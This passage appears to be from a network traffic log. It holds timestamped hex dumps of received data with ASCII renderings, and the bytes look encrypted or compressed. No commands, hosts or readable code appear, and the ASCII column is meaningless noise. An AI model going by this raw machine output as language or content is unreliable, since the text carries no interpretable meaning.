                                                          2022-09-11 08:16:25 UTC294INData Raw: 91 4d 33 2d 7b f1 43 a2 cb af a5 69 28 ff 3c 20 6f ec e1 a9 7b 57 83 bf 72 7b f0 28 05 c8 86 4e 8b 03 6b 74 01 ad 6f 8e c4 15 75 ea 3e 83 5e 23 87 d1 ac ad 00 ef 82 2b e5 ad 60 b1 3e a6 a3 e3 1c 03 a2 97 4c 60 67 20 c7 5a b3 2e e5 b0 3a 5e d3 5d 55 21 61 e6 32 37 bf 28 77 96 8a 29 2e bb ab 0a a3 bb 58 a5 a6 6a 6f a1 8f 71 59 f6 1e 7d bb 1a 34 7c 7c 06 cb 74 b0 ef 3d e2 3b 62 87 0f e5 a9 a6 be b6 e7 2f 8b 09 25 ef 2b 22 64 34 eb e5 3f ca 21 58 71 e8 a0 ce 86 d0 9b c4 9d c5 7f 84 a0 8f 84 ad 2f e2 5e eb 17 f7 37 ea a2 34 31 26 7c fd d4 1d c3 0b 04 f8 d7 86 4a eb ab b6 d2 d2 b1 64 a8 2c 31 c4 1b 65 8a 8c 63 65 e1 d4 51 a6 a8 cf c8 b9 74 26 f4 b8 76 bb 77 a4 05 55 59 db a7 c7 1d b8 a3 ca 26 b5 4c 36 63 5f fa 15 30 7a ae 7b a8 d4 55 61 1b 8a 36 85 0c 85 49 68
                                                          Data Ascii: M3-{Ci(< o{Wr{(Nktou>^#+`>L`g Z.:^]U!a27(w).XjoqY}4||t=;b/%+"d4?!Xq/^741&|Jd,1eceQt&vwUY&L6c_0z{Ua6Ih
                                                          2022-09-11 08:16:25 UTC298INData Raw: cc 2c d8 15 47 75 58 80 6c 03 91 00 c8 36 37 a2 50 02 f9 92 1a ee 0b 6a c7 ab 2a 63 ea 53 42 b2 d3 16 64 d1 5c 5e 4d 58 81 69 24 c0 73 80 b6 3a 4b 93 ea a8 e4 fb fe 0d c4 eb 52 5c 7b 4a 4d 9d 84 bb 8c 11 24 da c0 3f 5e 90 65 ee 28 61 f4 f1 64 2f 96 80 1e 84 f3 3c 17 95 b8 3e c7 76 dd 12 92 65 b7 36 cf 06 e0 74 b2 59 90 65 b9 37 dc 4d 34 2e 40 02 10 80 ba a2 75 f3 e3 a4 d6 7a 87 62 ec a7 e4 e3 e6 af 60 2d a7 26 88 c9 8f 8d 85 45 a5 7b b4 65 55 80 56 4e 76 3a 19 52 60 e7 16 11 63 2e 62 2d d9 c1 09 5b 2a 5a 95 7e b8 36 73 72 a1 f5 3f 31 66 e2 aa 04 cc ef ca 97 1b a5 c0 2b 4f 41 41 47 64 e3 08 06 0a 4a d8 59 08 04 e6 a2 64 64 b6 f8 0e 7a b0 69 0e c7 49 82 51 f5 c9 08 6b 6a ef 62 86 0b b7 32 66 8f ef 56 e8 7c e6 3c b0 7c b8 a1 c8 b6 a4 59 7c fd 60 18 d5 1a b4
                                                          Data Ascii: ,GuXl67Pj*cSBd\^MXi$s:KR\{JM$?^e(ad/<>ve6tYe7M4.@uzb`-&E{eUVNv:R`c.b-[*Z~6sr?1f+OAAGdJYddziIQkjb2fV|<|Y|`
                                                          2022-09-11 08:16:25 UTC300INData Raw: 64 52 e4 36 f1 f4 6f 63 2a eb 99 87 78 ed 20 b5 47 19 b4 58 c0 94 96 5c 3d 2d a4 9a f5 83 e4 2a 1f 96 a6 af 87 06 82 bb f7 8d 23 b8 2a 26 f6 0f b8 59 3e 87 ac 15 1f f0 2c 8a bf 52 16 d7 b9 8b 8a 82 41 9b 94 8b 7d 23 5e d2 77 94 76 80 2f 5c 14 71 a4 d0 2d cc c1 98 6a 4d 0b 63 19 9a ec 42 d5 88 57 21 d4 33 c5 67 21 1d 4d ee 47 49 32 ee dc 31 c5 6c 81 42 26 d4 68 9b ae 58 6b 52 21 29 e5 88 40 a4 f5 8a e6 0a c9 3c 9a 11 51 43 f6 a2 8d 9f 4d 7d a0 5f 93 91 9f 2e 5f 51 e7 6e d7 39 e2 06 b1 00 30 c7 64 e1 ec 69 a7 af 3f 91 cf e8 93 5a 4f c7 0c b4 f7 8a 36 79 5a 65 87 f2 28 ee e5 f4 98 6a 84 ca df 0c 4d 4b 57 ec 18 ab 5f 4d 70 9a 34 3f 2b d5 52 74 b0 e1 dc 15 2c 55 94 8c 0e a1 64 51 f4 42 a8 e1 cf a4 84 60 2c 69 5d 37 83 65 2e 33 b8 aa 87 45 1e 9d aa 62 a3 2a ea
                                                          Data Ascii: dR6oc*x GX\=-*#*&Y>,RA}#^wv/\q-jMcBW!3g!MGI21lB&hXkR!)@<QCM}_._Qn90di?ZO6yZe(jMKW_Mp4?+Rt,UdQB`,i]7e.3Eb*
                                                          2022-09-11 08:16:25 UTC305INData Raw: 26 83 7f 0a b6 b5 75 d2 11 e3 4c 19 e0 ce 98 65 d9 a5 57 d9 8d d2 8f 5c 50 e2 71 ed 81 ac 4b 76 97 6f a2 c9 ba 3e 5d 5e 03 c7 6a 90 08 db 5e 4a 1a 0b 82 a9 23 ba 10 c5 67 01 b4 8b 67 1e 41 fa f7 2b 06 a5 c9 2f 6e c7 c5 29 59 05 47 28 9f 14 c0 20 0c c8 1f ef 3a 9d b0 71 b0 d6 0e 22 c8 46 c7 22 bd 15 19 91 ec 29 e8 cf 32 ed a5 e3 dc 3c ab 77 1b 8d 41 92 59 bb 92 69 43 00 30 e9 b9 f7 fc a0 36 d1 30 bf 60 ad 5a a0 79 43 81 fd 39 71 95 75 b9 4b 80 56 80 a2 49 43 b2 4f 5b 81 1d 72 2f ab a1 84 d8 14 a6 65 1f c8 91 3d d7 6b a2 99 75 03 64 29 87 0f a2 95 2f 6a 68 43 bb ba 42 ca 33 76 32 f2 bc a4 66 cb 88 f5 ff ab 2c 30 af 79 af 31 5f 6f 32 ed 38 f5 dd 2f 13 3b 22 c7 48 d4 cb d9 84 d2 0f d4 99 16 aa 93 1a cf 08 e4 e6 e0 dc b3 d6 04 ae 6b 5a 4f 35 5e 3e 4a 1e f3 e8
                                                          Data Ascii: &uLeW\PqKvo>]^j^J#ggA+/n)YG( :q"F")2<wAYiC060`ZyC9quKVICO[r/e=kud)/jhCB3v2f,0y1_o28/;"HkZO5^>J
                                                          2022-09-11 08:16:25 UTC308INData Raw: 84 d8 f9 4c 9f 4f 82 b8 a4 10 ec 53 57 e3 da 13 f7 8d 66 7b b1 79 88 52 b7 8b de a3 ab 02 8b 37 b3 7f d5 27 9c 3a eb ab 78 39 e7 a0 f4 f7 62 d9 6b d9 62 b7 d7 76 bf 21 ce 2c 83 1c f1 6e 6e ac 13 d8 fa 79 6e ec 62 83 f3 13 c1 8b 2d 63 6d 10 5a 1d de 10 f3 0e e6 1a d8 8f 40 23 69 db d4 a0 b0 3c 61 4c 86 21 4e fd 79 5f fb 8e 83 ba 36 26 60 01 af 52 b0 ad 57 de 0b 41 a4 aa 24 95 ff 5f 10 24 47 6d 2d 70 89 e1 14 57 37 c6 06 33 d7 d3 5e e8 65 d6 e9 c1 73 9c dc 6e 28 36 8f 80 0f a8 db 78 17 ad 88 a8 f9 2f 29 3c 64 11 07 d2 bb 6a 52 6b a6 a6 1a 4f bb e7 e8 35 d3 d6 53 21 ff e1 56 6b 0e 42 87 26 8b 9a 29 dc 2a 5d d0 2d f5 2b 17 f2 d6 2b 47 94 58 7d d9 15 10 a9 e2 5b 4d 4a e2 1e 97 16 64 42 01 27 bf 54 38 9d ec a2 26 8a 37 1e d0 d1 83 66 33 1b b6 7a ea a2 d4 5d 66
                                                          Data Ascii: LOSWf{yR7':x9bkbv!,nnynb-cmZ@#i<aL!Ny_6&`RWA$_$Gm-pW73^esn(6x/)<djRkO5S!VkB&)*]-++GX}[MJdB'T8&7f3z]f
                                                          2022-09-11 08:16:25 UTC311INData Raw: 47 77 3a 94 c0 28 78 90 0d ea 87 ee 17 7b c0 03 c7 00 ac 60 f8 35 83 c0 28 18 9e 20 a3 63 4e 8a aa 08 2a 88 d3 3a a3 2c 05 a1 d7 05 3d a8 62 7e 8f 50 ad e9 cd f7 08 34 43 ff 23 eb d6 3b 8b 5e cd 63 0c ea c8 08 9b 8b 75 d7 08 c1 8e fc 73 b8 e5 4b c4 99 52 5c 97 38 27 ba 1b db 5a da e4 b9 77 6a ba c6 17 b9 a6 b9 8f 0e cf 3e 66 da 12 0f 76 2b e9 75 c8 56 2c c4 91 3a ec f9 37 02 0e e2 a9 7a fc 4f a1 99 2d 76 dd 02 ac 42 5d eb 66 b0 74 e2 50 80 fe f6 f9 ac 66 e0 ec 22 2a bc f4 2a 6c 06 49 1e ba dd 31 a8 8c ab 4a f4 b9 67 be 5e a9 2a 15 e8 78 7b 1f 7f 98 2d 65 c1 dc 29 f6 a8 5f f9 74 22 f4 22 8e a8 cf c8 b8 44 5a 46 2f 4b af 22 66 8f ef 5e ff ab 5a 1a 87 56 7e 27 0b 02 62 e2 27 8f 8a 23 a3 e1 c6 c0 e0 59 9d 2c eb e5 dd 39 09 f6 7f a9 27 9e 40 67 55 fe 34 a1 99
                                                          Data Ascii: Gw:(x{`5( cN*:,=b~P4C#;^cusKR\8'Zwj>fv+uV,:7zO-vB]ftPf"**lI1Jg^*x{-e)_t""DZF/K"f^ZV~'b'#Y,9'@gU4
                                                          2022-09-11 08:16:25 UTC315INData Raw: 7f 68 61 71 a9 72 3e f3 da e7 17 69 e5 8b 05 2c 52 db cb 8d 61 47 27 83 fe 4c 91 7b 8f 72 64 f2 a5 13 6d e7 31 f9 84 65 cd 7e d6 2b 82 0a ab 11 f7 13 bc 0d e4 2e 36 c4 dc 37 fe 24 b8 7c ae e4 26 2a a2 0f 97 32 64 64 b3 f2 9a d5 61 a7 26 26 aa 12 8f 74 e1 41 c4 32 eb 32 60 22 8c fb 0f ab b6 6b a6 36 bb 09 7a 80 ff d0 90 a9 55 d2 6e 87 66 c3 b9 f1 f2 b8 6d 59 69 db 95 e9 c7 b1 6d 3f 38 3b 0d 59 41 6f e5 79 16 23 ee 19 f4 44 a8 8a 77 4b bf a9 65 73 47 d7 92 72 8c 0d fd 78 50 fd b3 36 8b 6a a3 5e aa b9 3f 38 a0 69 47 e3 8a a3 69 c4 06 22 28 97 01 6c 3f 10 b8 82 25 2b 24 20 91 6a 90 e3 ed b0 72 61 07 b6 b3 6e 3c 1f 69 0f 39 9a ec d7 18 4f 33 df 32 eb a0 ec 17 4b 27 90 99 aa e2 d4 e8 54 1e dc f1 18 0e a2 fa 3e c0 b6 50 65 b7 75 e6 a0 20 58 a0 53 a8 11 dd 5d f0
                                                          Data Ascii: haqr>i,RaG'L{rdm1e~+.67$|&*2dda&&tA22`"k6zUnfmYim?8;YAoy#DwKesGrxP6j^?8iGi"(l?%+$ jran<i9O32K'T>Peu XS]
                                                          2022-09-11 08:16:25 UTC316INData Raw: 2f a9 e3 5a 4d 75 ed 24 89 59 b4 ae 65 6c a7 26 62 47 27 0c 85 2a 96 c1 1d fa 36 eb 26 df bf e2 ab c2 26 a9 71 32 8b 1e 93 ca 26 23 10 80 a9 b1 62 2e 58 b4 a5 08 8f f8 1d 4a c7 14 12 e1 3e b7 c7 4a c3 4e 03 87 fa fc 61 ed 61 2b 2a a9 d6 aa 4d 89 05 3d af a2 67 08 e4 20 ae 09 e9 ad d4 6d 14 33 6d 75 65 29 f0 f1 ea 4a 40 2c e2 d6 17 a2 07 46 60 01 af 22 47 fc 70 6b e6 a0 e9 0f 11 08 d3 2e da 3f ef 1a fc e3 c3 8a a0 4f 8c ec 27 c8 f6 97 a4 6e ac 7a 19 46 2a 23 67 ef 8f 4e eb ad dd d3 84 f1 6f 1e eb e1 c5 cb 66 ae 62 aa ec 4b 72 5d 67 ea 66 93 7e 1a 71 e9 ff 52 f3 1a 2b 86 4f 82 f6 2e 7a 8a 2f 21 3a 83 4d a6 30 44 ee 61 c8 2f a0 e1 85 8c ca 0b 66 ab cf c6 47 43 5e 73 10 35 65 36 12 47 ee f2 79 2e 63 cc 8e 6c 65 ae f8 ff 02 eb 39 b5 4a 26 6d a6 e4 ae ee e2 26
                                                          Data Ascii: /ZMu$Yel&bG'*6&&q2&#b.XJ>JNaa+*M=g m3mue)J@,F`"Gpk.?O'nzF*#gNofbKr]gf~qR+O.z/!:M0Da/fGC^s5e6Gy.cle9J&m&
                                                          2022-09-11 08:16:25 UTC332INData Raw: de 7a ca 47 6f 92 aa 5e ad a3 1b 51 ea a2 af 6b 57 1e ea ff fa 2a 57 50 35 f2 77 b6 cd 0d f9 cc 53 63 22 90 94 13 9a 2e ed a9 2f a1 34 02 c7 7a dd 48 b6 2b ee a8 3e a9 83 91 a6 d2 e0 a4 d9 28 c3 0c 2e e9 e5 af 78 3a c3 89 2a ab 1b f2 4a 6f b2 85 9f e4 fe f1 60 26 b7 cf 17 2b 68 26 40 07 67 eb e2 6b ef 7e fa a0 20 af 64 d8 41 4e 73 85 65 ae e8 62 ee 9a 29 11 68 24 2b 23 2c 37 99 b6 f4 f3 a6 dc cf 4b f7 1a 68 85 a7 6e 82 17 df ee 57 72 64 8d ef cc 76 59 07 8f 9a 42 d6 74 f8 22 e3 40 c1 79 a3 5c c0 77 f4 ab bc 70 5f 17 fa 21 7b eb 63 39 48 25 f3 f5 a5 d9 4d ba 1d a0 a7 9a e9 80 b4 91 58 f8 8e dc 6c 2b ba 92 c5 20 64 5a bc d2 ff 68 62 ed 00 ac c5 c8 b3 8f bf 41 eb 04 db 53 fb 7e 9b 26 fb 4e 6e 92 d4 3e b4 1b 9e b3 99 a5 82 9e 97 bb c3 7a 82 19 e0 0f bf 0f ef
                                                          Data Ascii: zGo^QkW*WP5wSc"./4zH+>(.x:*Jo`&+h&@gk~ dANseb)h$+#,7KhnWrdvYBt"@y\wp_!{c9H%MXl+ dZhbAS~&Nn>z
                                                          2022-09-11 08:16:25 UTC333INData Raw: c7 2c cc df 63 ef d7 78 d3 39 61 cc f7 38 e2 7d b0 18 40 13 40 06 a0 05 87 aa 00 c3 91 b5 67 35 2e 3f cf 96 5f a2 dd a8 e5 39 a5 a5 d9 82 bc 9e 4e 66 5b 85 51 8e ab 77 52 b7 c6 a8 90 bd fc 5a 52 df c9 13 86 ed 1f 33 e3 b1 a0 92 5c 18 cf 75 a4 ea bd 5c 9b f7 ac 13 66 82 83 80 6e c6 df 71 64 32 7f fd 52 b9 87 56 4f c3 1b d6 e1 92 a5 22 6a 2f 68 65 23 02 4a 6b a7 26 66 6b 2b 4e 2b c2 a7 6a e2 1c 54 aa 2a b4 f5 e6 61 35 4c 45 7e 63 77 32 f1 b4 cf 46 68 26 53 59 75 01 24 54 a3 6a 58 80 16 6e fe 93 6b 2d d4 90 7d 70 65 5c 91 2b 5f d3 97 5a a7 22 66 eb 03 e2 13 fa df 5f 61 27 a6 bd f3 0a a3 0a e7 7e 80 8b 3d 62 6c 29 90 80 52 7c 50 35 11 87 a0 36 98 0b f9 7c 62 a3 c7 26 cf 27 61 2f 25 ad ea e4 66 e2 a6 40 c5 a9 f9 f7 64 2e 97 d9 fe cf 17 4d 80 05 4c c6 8f 49 c8
                                                          Data Ascii: ,cx9a8}@@g5.?_9Nf[QwRZR3\u\fnqd2RVO"j/he#Jk&fk+N+jT*a5LE~cw2Fh&SYu$TjXnk-}pe\+_Z"f_a'~=bl)R|P56|b&'a/%f@d.MLI
                                                          2022-09-11 08:16:25 UTC344INData Raw: dc 55 84 75 82 d3 37 d8 86 d9 96 db 8b ea 06 64 55 38 42 4a 09 5c fa 65 38 69 37 e6 7a 38 f6 3c 71 7b 9d 50 24 35 51 f8 2b 5c 26 38 81 49 be 85 70 8e 75 de c0 b9 d8 f6 76 09 25 f9 5e d2 e7 98 5d 73 69 d5 71 26 2d 22 29 8f a6 fa 7e 62 e7 f8 6a 04 a4 52 1e 54 b3 4f 8a a4 da 78 df f2 a8 3b 8b ef 9b b3 0e 63 99 15 b3 fa 44 0b b5 08 b1 5a e8 35 42 44 1e 68 92 42 ee ce 73 0e d4 90 9e a5 68 ec 71 cc c5 2a c3 66 cf 0e 0f 08 14 61 b1 99 aa 15 37 7b 1e 07 56 1b f5 cd a2 f4 09 74 dd ab 1c 45 27 e0 1c 18 b0 3e e2 ae 17 18 bd 92 34 d4 2f 00 28 1a 24 f0 3f db 92 ba d1 90 5e 24 a5 32 a3 27 3b b9 ec 81 2e f1 72 47 4e eb 37 81 ec 51 4c 8b 17 b7 e3 52 0c bd 19 47 a7 00 95 cf 9b f1 00 55 1a ea 4e 02 a6 fd 05 0f 10 64 0b a9 49 53 77 ab 61 2d 07 f4 96 14 67 c3 0e ec e0 5f 8b
                                                          Data Ascii: Uu7dU8BJ\e8i7z8<q{P$5Q+\&8Ipuv%^]siq&-")~bjRTOx;cDZ5BDhBshq*fa7{VtE'>4/($?^$2';.rGN7QLRGUNdISwa-g_
                                                          2022-09-11 08:16:25 UTC348INData Raw: 7d 82 a8 7d a8 6a 3e 85 29 6d eb ad eb a2 1f 08 3a a9 28 a5 0a 8c 66 2c 48 43 97 64 58 95 b3 84 4a e8 3f 67 a7 d4 e7 ee 12 df e2 df c2 fb 76 7a aa a6 15 11 eb e9 20 fe 63 76 6b 63 16 52 ef a7 f9 c5 93 4c 42 d2 d4 22 d3 24 1d ca 6f 16 33 43 c2 a7 a6 ad b8 01 46 f5 61 27 e0 c2 ee 4b 6f e5 49 ec c9 43 0e c7 9e 7f 26 d7 9c 0a f8 54 d4 11 11 d3 98 72 80 6a 58 80 ec 9a 88 6a 9c 3b 0b 22 1f d2 12 d1 da 96 63 a3 68 27 57 80 d2 8a 2d 60 ef ab 68 04 c7 a1 dc 6d 58 1e 33 c2 64 29 87 2c fe 99 5c 6a 58 29 d0 d5 7a 00 d3 62 6c af c1 aa d1 02 d3 ef 8f 05 18 80 0e 7b 08 68 27 ff 82 4c 09 53 e1 ac 9a 6e 92 32 4b d6 e2 2a a7 ea cf 4e 15 ea a6 59 4e 4c a1 ae 67 6e e2 79 74 0f 12 72 ef e1 29 64 ee 2c a3 22 dc 59 63 e6 66 a7 c7 0e e8 d2 10 68 ed a9 f5 d5 42 11 5d 6c d7 66 9f
                                                          Data Ascii: }}j>)m:(f,HCdXJ?gvz cvkcRLB"$o3CFa'KoIC&TrjXj;"ch'W-`hmX3d),\jX)zbl{h'LSn2K*NYNLgnytr)d,"YcfhB]lf
                                                          2022-09-11 08:16:25 UTC350INData Raw: 7f 49 92 c7 c5 f3 36 88 8e ba 07 5b 37 bb 77 6a d2 30 d9 b1 68 0a a7 0e e4 65 da 33 33 b7 16 be 28 19 b4 9b a9 78 00 cd bd 59 d9 32 8e 56 1f c8 61 99 fc 83 25 6b d1 14 87 c0 24 41 0a ec c7 0a a4 6a e2 af 24 7f 37 ef 2d 88 d0 3c ee 5a 45 fa e5 49 f3 32 cb 29 9c 16 e1 7d b7 27 2f df d8 65 84 a7 46 c7 24 7d 36 37 b9 df bf 02 d3 ab 5c 53 24 88 95 26 66 bb df 2e 8e a8 77 31 bf 3b 65 8a ec 03 65 92 f4 62 c6 a8 cf d6 5c d2 98 3e 13 8b d6 cb 2c 33 0c a3 f1 be 7f a2 56 4b 87 c3 6f 0b b4 99 a0 ec f7 99 57 bf 21 37 3b d8 95 ad 21 58 f7 5a d4 85 73 f2 55 32 1b df 96 52 f2 d4 83 9e 9c 76 f4 b3 4d de 26 d8 4a 93 2b f3 37 aa 72 1c ca 47 f3 fc 46 56 fb b2 52 bf dd dc 62 b9 d3 3c b0 2d bf 78 86 13 f2 58 b0 84 4d 42 aa 5c 82 70 9a e3 aa fe 86 5c d2 8e 30 90 4d ae d6 85 ef
                                                          Data Ascii: I6[7wj0he33(xY2Va%k$Aj$7-<ZEI2)}'/eF$}67\S$&f.w1;eeb\>,3VKoW!7;!XZsU2RvM&J+7rGFVRb<-xXMB\p\0M
                                                          2022-09-11 08:16:25 UTC355INData Raw: 38 3a 50 7d 55 f1 30 0b 1a db d6 b4 e7 ca 09 64 67 89 85 6b 66 88 8e e3 ef af a9 4b 82 d9 1a 60 05 c1 65 20 a7 49 0a ae 66 f5 32 0b c8 e5 a7 d0 be c4 21 60 e4 81 4e a8 27 5c d2 a9 1d 8c 9b 0a c3 87 4e 71 d0 2e 66 58 dd 3d f1 aa 77 fb 24 ab df 39 48 ee d4 7b 84 af 68 21 d0 3a e3 48 2c 98 90 e1 e4 ad b4 1b 87 23 28 ee b0 dc 45 4a 0e 98 b0 8f 95 50 1a 91 23 0d a7 4c e4 2f 18 39 ef ca ef e5 6c e5 c8 46 67 ea 07 4a 60 ee 98 84 21 5f 84 e1 95 53 13 d5 95 d2 ea 3b 99 77 7a 1d 17 07 af 4d 63 6e 0c e1 fa 9c 08 f0 5e e9 17 d6 0b cc 38 32 2b 7f d7 2e 26 7e ff a7 1b ba fc 4a c8 5e 5b d9 b7 74 b1 8d 5c 71 da d7 f6 aa a6 0d c2 6a f5 22 fe 23 64 b0 56 ca a5 41 2e df 4b fa fe 6e 1a 53 4c 40 de 71 55 9e 91 51 0f d6 fb 25 83 4a c9 51 2e ed ad b2 25 ca 13 2a 85 fb 30 42 f9
                                                          Data Ascii: 8:P}U0dgkfK`e If2!`N'\Nq.fX=w$9H{h!:H,#(EJP#L/9lFgJ`!_S;wzMcn^82+.&~J^[t\qj"#dVA.KnSL@qUQ%JQ.%*0B
                                                          2022-09-11 08:16:25 UTC361INData Raw: 25 16 59 1e c0 3c 68 e3 a7 a9 e1 66 7e 30 50 c5 e7 f6 c2 cf ab 2c a4 5d e0 15 15 d3 8e 10 1c 80 d0 b2 2f 8f 21 61 69 ae d2 59 51 d9 69 37 34 a4 e2 27 44 f5 50 6d 2a 5e 51 17 5a ea b0 3d 4a e1 ce 0a 2d 0e c7 8c a0 6a a7 ea 5a 10 5f 5c ed e9 6e 5b a0 54 ed 26 4b 80 66 23 65 2f 21 41 14 f2 62 67 64 09 e1 6a ce 7a 3c 4e 02 6f a7 6a c1 03 c6 4c ff 3b ae a1 e5 a3 af 6b a6 22 0c 89 f7 b8 d5 1a 26 33 1f c2 62 67 c6 a3 1f 9c ce 07 1d 52 46 2b 27 aa a6 39 24 bb a6 23 3f ba a6 b1 7d 6b f6 1a 37 bc ce 9b 84 14 06 07 23 d8 fe 68 fd 92 87 eb c6 0f c0 a8 04 97 5b b4 fb fa 54 c1 d4 9b 11 8b 3f cf 03 8b c2 eb 62 c8 ce 16 0c 9b 4e a6 55 74 c2 ee a2 4e 84 89 21 0c e6 24 d6 f6 08 44 0d e2 e5 88 5e b2 53 b1 04 1d 53 d8 86 b6 6f a9 eb e4 c5 80 2e 82 48 25 db 2b d3 a8 ed e3 64
                                                          Data Ascii: %Y<hf~0P,]/!aiYQi74'DPm*^QZ=J-jZ_\n[T&Kf#e/!Abgdjz<NojL;k"&3bgRF+'9$#?}k7#h[T?bNUtN!$D^SSo.H%+d
                                                          2022-09-11 08:16:25 UTC366INData Raw: ee 5f 58 66 20 29 6d 26 e9 a6 2b 79 a2 6b b8 a1 c8 86 87 0b 6d 20 2e a9 d6 d8 ef e1 dd da 65 11 5e 1e fe 46 ef af 60 48 30 80 d5 47 ed 68 a5 22 64 e7 e4 1c 5d a3 ef a9 fb f5 64 2f 2c a2 0a 0b e3 90 c8 1a 46 04 45 a8 cd 4f b8 4a 98 75 53 92 b4 5b 94 1d d2 67 ee a5 60 02 e3 4e 68 e1 67 42 75 a4 ac 6a 10 a9 18 c1 f8 aa 7a 0d 1d 43 8e 2a 2c e9 fb b9 e7 ec a8 9b 59 6b b2 15 83 21 a3 41 46 a1 ce 23 d8 6b a2 79 d7 ad 7d 9e 76 62 ae 06 48 e9 e6 79 d5 4a db 27 da ac fc 3f 56 95 f5 b6 a3 1d ff 5d c8 0d fd aa 28 a6 2e 2b f5 bb dc 9d 23 30 76 1c 3a e1 c0 5e 5d 28 ed a8 d0 9e 5d d8 6f 22 6a 26 1a 02 38 90 9e 32 bf 1e c5 7c 33 ff e3 63 60 2a 6c 27 61 22 2d a8 fe e3 15 03 4d 94 cc 6a 6b 99 3c 32 23 aa 60 6d a0 6c a1 56 47 12 f3 d5 29 34 b8 22 6c 28 6a 2e 66 bf df 4e 87
                                                          Data Ascii: _Xf )m&+ykm .e^F`H0Gh"d]d/,FEOJuS[g`NhgBujzC*,Yk!AF#ky}vbHyJ'?V](.+#0v:^](]o"j&82|3c`*l'a"-Mjk<2#`mlVG)4"l(j.fN
                                                          2022-09-11 08:16:25 UTC370INData Raw: d0 c8 aa 61 14 50 8b 82 88 89 eb d6 e4 5c e2 aa c6 fb c4 1a 42 d7 d9 28 ed af 37 35 19 96 8f cf 2e 6b f9 f0 66 65 ed f7 19 8f 84 f1 9e 29 5e ce bb 6c 19 12 c3 df f7 68 a5 24 ed 8f c9 64 8c d5 e6 d6 08 60 08 cf 84 eb 05 63 b8 79 a4 e1 6f 31 4d 97 b8 31 fc 3a e8 74 f3 2f 2e a6 52 da b6 7b ea 37 48 80 6e 81 92 68 b7 1c 42 94 da fa 31 39 f2 0c 45 67 6b 96 1b 2b ec 21 23 db dc 78 40 80 74 fc f5 79 bb 6f 50 80 20 cb 34 ca 2c 19 4e 33 a2 07 e6 2a 8c 03 b4 6d 98 4f eb f2 1b 2f e7 ea a7 02 77 5a 51 6b 94 05 04 b4 54 e6 06 e8 10 1b e3 2b a7 0b b7 10 6d db 94 58 57 f1 b4 a9 dd d7 60 23 6d 2a 6e 2a 15 75 31 78 83 b2 d2 ea 3a 63 c0 c0 c9 dc a1 5d c9 3d ee bb 6a 67 c8 6b a4 77 6b 19 4d 13 35 b8 1a ab 57 e8 40 af 89 55 3a 56 54 99 0b b7 0f 65 89 a9 a2 35 38 60 a0 59 d6
                                                          Data Ascii: aP\B(75.kfe)^lh$d`cyo1M1:t/.R{7HnhB19Egk+!#x@tyoP 4,N3*mO/wZQkT+mXW`#m*n*u1x:c]=jgkwkM5W@U:VTe58`Y
                                                          2022-09-11 08:16:25 UTC372INData Raw: 2c a9 d7 1b 65 35 3f 45 c4 81 01 ac e9 eb 6a 93 e7 5a 4f 09 b3 f5 a7 22 64 ad eb 4e c3 a1 ef 59 58 a4 27 2b f7 72 64 60 e6 aa a7 6a a7 26 66 ab cf 02 d8 8b 3d 22 2e a5 b9 7a 64 af b1 76 63 61 de d0 66 b7 d7 7e 97 66 ab 26 af a3 68 29 61 eb c9 c0 26 69 ed 68 66 97 f7 66 8f 4c 81 4a cf af 7c 0c 50 eb a5 2c a7 68 81 b3 4d 7f 88 47 a5 6a 24 11 a0 e0 db 9c 4d 72 ab 6b b3 3a 68 11 64 a6 19 aa 22 90 bc 8f c5 49 e9 20 1c 17 20 a6 90 95 ce 45 a5 ad dc 93 a6 1e d7 eb dd e1 fa 0a 63 ef 20 e5 a6 6a 23 39 99 1f 4a 5a 18 6a dd 2f 12 0d b5 19 f4 62 c3 ad ea ac 27 61 2c 2f dd 70 82 68 a5 ef dd e0 9d 0e 67 91 fe ae ad 3d 77 09 89 24 41 8f 22 02 45 ea 27 9a a7 6a 58 26 60 8d ef 3e 5c 26 28 22 2c 9d ff 36 97 a9 98 fa 01 68 27 74 f1 a9 b0 d2 0b e2 a0 4d cb ad 58 3a eb 03 7a
                                                          Data Ascii: ,e5?EjZO"dNYX'+rd`j&f=".zdvcaf~f&h)a&ihffLJ|P,hMGj$Mrk:hd"I Ec j#9JZj/b'a,/phg=w$A"E'jX&`>\&(",6h'tMX:z
                                                          2022-09-11 08:16:25 UTC377INData Raw: 91 54 a7 67 55 1f d0 9a 96 e1 2e 62 7e b6 82 10 e4 b3 ce 09 4d f0 b4 06 db 1a a1 2c 96 0d 81 d1 f5 58 6d 03 64 a1 2c 49 f2 6f 1f 6a 77 bf b0 3a ad e2 77 0f d5 85 c9 9c 6d 3b 44 67 4a dd 1a 32 d6 49 a8 16 37 91 7c 51 bc b4 a3 fd ba f2 8d 3c 3b 6a 8c 56 97 e3 2f 24 4e b8 0e fb ef e3 2f 9d 93 a9 d2 14 17 42 2d 42 91 84 dd b8 e5 20 64 a1 c5 ac 87 8e f7 00 54 30 e4 ce 83 1d 70 a7 aa 52 67 a1 89 b6 70 18 f2 2e a2 42 64 e5 86 7f 57 a8 64 91 76 c1 e2 27 d4 99 1b 0a 73 e5 a0 22 a8 d4 1b ef ce 88 a4 1f da 8c 7b 98 77 7d 88 81 d4 db 82 a5 bb 28 11 8e 4c d4 16 6e 48 80 b3 4d 9c 79 56 95 30 17 a5 b5 0c 29 87 b6 2f b4 c4 6f 91 58 67 41 4b 85 f4 6e 18 6a ab d6 16 c9 06 98 50 5f 5d 4b 0e 4a 26 9e 37 2e 68 f0 c1 9d 16 db e0 69 6c e1 a7 ee e3 df 93 28 b6 f0 c7 e4 04 6d 65
                                                          Data Ascii: TgU.b~M,Xmd,Iojw:wm;DgJ2I7|Q<;jV/$N/B-B dT0pRgp.BdWdv's"{w}(LnHMyV0)/oXgAKnjP_]KJ&7.hil(me
                                                          2022-09-11 08:16:25 UTC381INData Raw: 5b 5a 8d 00 ef e1 e8 e6 66 bb f7 2a 66 e3 cf 12 ff ab 5e 02 e8 7c 66 bc b0 7c b8 a3 ca 06 27 43 8e e1 16 15 d1 a6 19 a0 f5 b3 e3 a7 14 19 65 11 1b af 0e 32 67 9e 60 13 55 69 64 21 2e fc b1 a8 a2 a2 65 7d b7 a9 2e 81 ce e2 67 ee 66 e2 45 8c a6 68 a5 22 62 af 67 0a 05 28 99 5c a7 ea a0 91 9a a0 eb ad ef ab 42 22 b3 1b 6d 2e 69 6a 3f 7a 62 02 ab c1 e9 58 78 02 66 97 f7 6e 87 65 a5 5c 94 9f d1 26 e5 49 f9 17 eb d6 f2 47 91 8c f1 22 67 61 87 69 94 aa c5 d4 a2 3e 72 5a 37 cf f9 31 66 24 ed f8 98 d6 da c3 94 f3 7d 9a bb 7c 2d 48 3d d2 af ca 64 8b 14 53 23 52 1a 77 1b 